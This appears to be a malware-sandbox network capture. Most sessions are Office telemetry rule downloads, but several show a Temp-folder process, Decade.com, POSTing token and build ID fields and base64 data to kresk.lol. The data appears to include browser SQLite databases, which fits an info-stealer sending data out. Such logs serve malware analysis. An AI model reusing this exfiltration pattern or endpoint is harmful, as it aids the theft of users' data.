2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:35 UTC	16355	OUT	Data Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54 Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-04 11:17:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:35 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:35 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111735Z-1746fd949bdmv56chC1EWRypnn00000001a00000000034x5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:36 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:36 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:36 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:36 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 3e1c70e6-d01e-0028-76c3-457896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111736Z-1746fd949bddtfvqhC1EWRxbpg000000015g000000000eqv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:36 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:36 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:36 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111736Z-1746fd949bddtfvqhC1EWRxbpg00000000yg000000008753 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:36 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:36 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:36 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: d1823508-801e-008c-16d3-457130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111736Z-1746fd949bdmv56chC1EWRypnn0000000180000000005k0w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:36 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:36 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:36 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:36 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111736Z-1746fd949bddgsvjhC1EWRum2c00000001fg000000001f8r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:36 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49850	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:36 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VAS26F37QIEUAAI5FUAS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:36 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 Data Ascii: ------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------VAS26F37QIEUAAI5FUASCont
2024-12-04 11:17:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:36 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 